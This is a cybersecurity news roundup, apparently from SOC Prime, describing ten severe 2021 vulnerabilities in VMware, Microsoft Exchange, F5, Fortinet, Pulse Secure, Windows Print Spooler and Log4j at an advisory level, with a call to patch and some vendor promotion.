The Top 10 Most Severe Vulnerabilities In 2021

Uploaded on 2022-01-04 in NEWS-Cybersecurity News, FREE TO VIEW

Brought to you by SOCPrime

The past few years spelled a radical shift to online. The global trend toward digital processes’ acceleration inevitably set the grounds for the growing number of cyber threats and their evergrowing sophistication. So as to back up this statement with supporting evidence, it is worth looking back on the top cybersecurity exploits and incidents of 2020, tapping into all the valuable insights and lessons the past year brought to the industry, put together in the SOC Prime report.

As for the year 2021, here are disturbing cybersecurity stats for 2021: security experts report about 18,582 vulnerabilities (CVEs) caught so far this year, compared to 17,041 detected in 2020. Moreover, 2021 was marked with a significant increase in reported zero-days. At least 66 zero-day issues have been publicly revealed this year, doubling the total number of those identified in 2020.

Those numbers are putting more strain on security practitioners, already keeping pace with timely threat detection and software patching. The savviest ones are turning to the world’s largest Threat Detection Marketplace powered by SOC Prime that delivers over 130K curated Sigma-based content items to identify critical threats challenging businesses, including detection algorithms for all high-severity CVEs mentioned above. Security performers can easily convert them from the generic Sigma standard to 20+ SIEM, EDR & XDR formats using the platform's inbuilt automated capabilities or with the help of Uncoder.io, a free online tool for on-the-fly content translations.

In the aforementioned circumstances, cybersecurity awareness is raising the stakes. This report, based on CISA findings & recommendations as well as SOC Prime research, highlights the ten most severe vulnerabilities and exposures of 2021 that affected a broad spectrum of products from VMware, Microsoft, Apache, Pulse Secure, and F5 Big IP, helping to make sure you have not missed on anything.

1.    Critical Unauthorized Remote Code Execution in VMware vCenter (CVE-2021-21972)

On February 23, it was announced that the vSphere Client (HTML5) contained an RCE vulnerability in a vCenter Server plugin.

●    The bug, if unpatched, allows unauthorized hackers (with access to port 443) to issue a specific request and execute arbitrary commands on the targeted server. 
●    Attackers gain access to compromised environments and sensitive data.

2.    Microsoft Exchange ProxyLogon Attack (CVE-2021-26857, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065)

On March 2, Microsoft released security updates for a number of critical vulnerabilities that compromise MS Exchange servers: CVE-2021-26857, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065. Today, this chain, commonly referred to as ProxyLogon, is the most well-known and impactful Exchange exploit.

●    If exploited, it enables a threat actor to bypass the authentication requirements and obtain admin privileges.
●    The majority of attacks were aimed at uploading the initial web shell to the server for future malicious actions.

3.    Critical Vulnerabilities in F5 BIG-IP, BIG-IQ (CVE-2021-22986, CVE-2021-22987, CVE-2021-22991, CVE-2021-22992)

On March 10, 2021, F5 addressed four critical vulnerabilities in BIG-IP and BIG-IQ products.

-    CVE-2021-22986, an unauthenticated RCE vulnerability in the iControl REST interface. Unauthenticated users could exploit it through the BIG-IP management interface and self IP addresses to carry out arbitrary system commands, manage files, and disable services.
-    CVE-2021-22987, the most severe out of the four, is a remote code execution vulnerability that stems from a misconfiguration in the Traffic Management User Interface. In the wrong hands, it leads to authenticated RCE in undisclosed pages if running in application mode.
-    CVE-2021-22991 is a buffer overflow issue, resulting in remote code execution and denial-of-service (DoS) on the impacted installations.
-    CVE-2021-22992— much like the previous one, this critical security hole allows for DoS and RCE, with a potential of a complete system compromise.

4.    Multiple FortiOS Vulnerabilities (CVE-2018-13379, CVE-2019-5591, CVE-2020-12812)

In April, CISA and the FBI published an advisory on the vulnerabilities in FortiOS used in Fortinet SSL VPN. These vulnerabilities present the following threats:

-    CVE-2018-13379 — a path traversal vulnerability. Allows an unauthenticated attacker to get hold of FortiOS system files via specially crafted HTTP resource requests.
-    CVE-2019-5591 — a default-configuration bug. Enables a ransomware actor on the same subnet to intercept sensitive information by impersonating the LDAP server.
-    CVE-2020-12812 — an improper-authentication flaw. Grants a successful log-in without the second factor of authentication (FortiToken), given the changed case of the username in question.

5.    Critical VMware vCenter Vulnerability (CVE-2021-21985)

On May 25, it was reported that the vSphere Client (HTML5) has a remote code execution vulnerability due to a lack of input validation in the Virtual SAN Health Check plugin, enabled by default in vCenter Server.

●    When exploited, the vulnerability allows adversaries with network access to port 443 to execute arbitrary commands with unrestricted privileges on the underlying vCenter host.

6.    Ivanti Patches Critical Pulse Connect Secure Flaws (CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900)

Since June 2020, for almost a year, at least several major hacking groups deployed numerous malware families to exploit flaws in Ivanti Pulse Connect Secure suite of VPNs to access government agencies, critical infrastructure objects, and private firms across the U.S.

●    Threat actors are using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence.
●    The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.

7.    Patch Bypass Vulnerability in Pulse Connect Secure (CVE-2021-22937)

This is a post-authentication RCE vulnerability in Pulse Connect Secure virtual private network (VPN) appliances. This flaw was exploited in June 2021, bypassing the patch issued in October 2020 that addressed the CVE-2020-8260 — a notorious bug that allowed for RCE with root privileges.

●    If exploited, the vulnerability allows an authenticated user with administrator rights to overwrite arbitrary files via an archive, uploaded in the administrator web interface.
●    The bug introduces a persistent backdoor that compromises VPN clients.

8.    PrintNightmare Vulnerabilities (CVE-2021-1675/CVE-2021-34527)

In June 2021, Windows’ PrintNightmare RCE vulnerability got in the public eye. It has been around since the beginning of 2021, but there was not much fuss about it from the start since it did not present, allegedly, much of a threat to users’ security. However, after a careful re-accession in the summer of 2021, the vulnerability was stamped critical, passing its credentials to a different security issue — CVE-2021-34527.

●    The vulnerability allowed an attacker with a regular, unprivileged user account to remotely take control of a server running the Windows Print Spooler service.
●    Successful exploitation empowers authenticated adversaries to perform privileged file operation abuse.

Now that the dust has settled, there are two official patches available for installation to mitigate each of the PrintNightmare flaws —  CVE 2021-1675 and CVE-2021-34527.

9.    Microsoft Exchange ProxyShell Attack (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)

In August 2021, security researchers revealed another notorious Microsoft vulnerability —   ProxyShell. This is an umbrella term covering three severe bugs:

-    CVE-2021-34473 — a pre-auth patch confusion issue that results in ACL bypass
-    CVE-2021-34523 — an elevation of privilege flaw on the Exchange PowerShell backend
-    CVE-2021-31207 — a post-auth arbitrary-file-write misconfiguration

●    The flaws work in tandem, providing the grounds for threat actors to execute arbitrary commands on Microsoft Exchange Server through an exposed 443 port.
●    As of today, the flaws are patched with the official security updates released by Microsoft in May and July; however, over 30,000 Exchange servers remain vulnerable to date, motivating attackers to leverage those vulnerabilities.

10.    Critical vulnerability in Apache Log4j library aka Log4Shell or LogJam (CVE-2021-44228)

The Apache Log4j Java-based logging library vulnerability was revealed on December 1 and is posing a critical risk to affected systems, scoring 10 in CVSS.

●    If successfully exploited on one of the servers, it gives a threat actor the ability to load and execute arbitrary code from an attacker-controlled domain and, in particular cases, gain unrestricted control of the whole system.
●    Adversaries leverage this flaw to install coin miners, DDoS bots, and Cobalt Strike implants to recruit vulnerable devices into a botnet and export data from the compromised machines.
●    Thousands of apps and services globally leverage the vulnerable log4j library for its operational routines.
●    Log4Shell might be weaponized to reach the WannaCry scenario.

At the risk of sounding like a broken record, let’s conclude by saying that keeping one’s finger on a pulse of attacks’ development presents an opportunity to better understand the latest trends in the cyber threat landscape, boosting your cyber defence skills. First of all, make sure all of the relevant vulnerabilities listed above are patched. Second, a shout-out to cyber researchers and enthusiasts - regularly monitor and consider contributing to threat detection platforms.

You Might Also Read: 

Log4j Cyber Security Flaw Seriously Concerns Experts:

 

« Disinformation Is A Prevalent Threat
Pegasus Spyware & Not-For-Profit Cyber Security - What Are The Risks? »

Infosecurity Europe
CyberSecurity Jobsite
Perimeter 81
Cyrin

Real Attacks. Real Tools. Real Scenarios.
Schedule a demo

Sign Up: Cyber Security Intelligence Newsletter

Directory of Suppliers

Authentic8

Authentic8

Authentic8 transforms how organizations secure and control the use of the web with Silo, its patented cloud browser.

NordLayer

NordLayer

NordLayer is an adaptive network access security solution for modern businesses — from the world’s most trusted cybersecurity brand, Nord Security. 

Infosecurity Europe, 3-5 June 2025, ExCel London

Infosecurity Europe, 3-5 June 2025, ExCel London

This year, Infosecurity Europe marks 30 years of bringing the global cybersecurity community together to further our joint mission of Building a Safer Cyber World.

The PC Support Group

The PC Support Group

A partnership with The PC Support Group delivers improved productivity, reduced costs and protects your business through exceptional IT, telecoms and cybersecurity services.

ZenGRC

ZenGRC

ZenGRC (formerly Reciprocity) is a leader in the GRC SaaS landscape, offering robust and intuitive products designed to make compliance straightforward and efficient.

ClearedJobs.Net

ClearedJobs.Net

ClearedJobs.Net is a career site and job fair company for professionals seeking careers in the defense, intelligence and cyber security communities.

Commonwealth Cybercrime Initiative (CCI)

Commonwealth Cybercrime Initiative (CCI)

The CCI unites 35 international organisations contributing to multidisciplinary programmes in Commonwealth countries. These organisations form the CCI Consortium.

Ioetec

Ioetec

Ioetec's mission is to connect users to their IoT devices securely, ensuring these devices remain safe to use in our increasingly connected world.

Estio Training

Estio Training

Estio Training is a specialist digital and IT apprenticeships provider, dedicated to introducing new skills and developing existing talent in businesses across the UK.

Calyptix Security

Calyptix Security

Calyptix Security helps small and medium offices secure their networks so they can raise profits, protect investments, and control technology.

Cohesity

Cohesity

Cohesity radically simplifies the way businesses back up, manage, protect, and extract value from their data—in the data center, at the edge, and in the cloud.

Antares NetlogiX

Antares NetlogiX

Antares Netlogix are a leading Austrian service provider for IT security, critical infrastructures and managed security services.

Cirosec

Cirosec

Cirosec is a specialized company with a focus on information security. We carry out pentests & audits and advise our customers in the German-speaking countries on information and IT security issues.

National Institute for Research & Development in Informatics (ICI Bucharest) - Romania

National Institute for Research & Development in Informatics (ICI Bucharest) - Romania

ICI Bucharest is the most important institute in the field of research, development and innovation in information and communication technology (ICT) in Romania.

stackArmor

stackArmor

stackArmor specializes in compliance and security-focused solutions delivered using our Agile Cloud Transformation (ACT) methodology.

CyberCatch

CyberCatch

CyberCatch provides an innovative cybersecurity Software-as-a-Service (SaaS) platform designed for SMBs.

Aiden Technologies

Aiden Technologies

Aiden simplifies your IT process, giving you peace of mind and security by ensuring your computers get exactly the software they need and nothing else.

Security Compliance Associates (SCA)

Security Compliance Associates (SCA)

The sole focus of SCA is safeguarding critical information and complying with information security regulations.

Blue Cloud Softech Solutions

Blue Cloud Softech Solutions

Blue Cloud Softech propels inspiring digital transformations. We provide AI products, cybersecurity, healthcare technology, and cloud solutions.

NetSfere

NetSfere

NetSfere provides next-generation messaging and mobility solutions to carriers and enterprises globally including its enterprise-grade, secure mobile messaging platform NetSfere Enterprise.

Panasonic Automotive Systems

Panasonic Automotive Systems

Panasonic Automotive Systems brings together security technologies and human resources cultivated across an extensive range of businesses into the automotive field.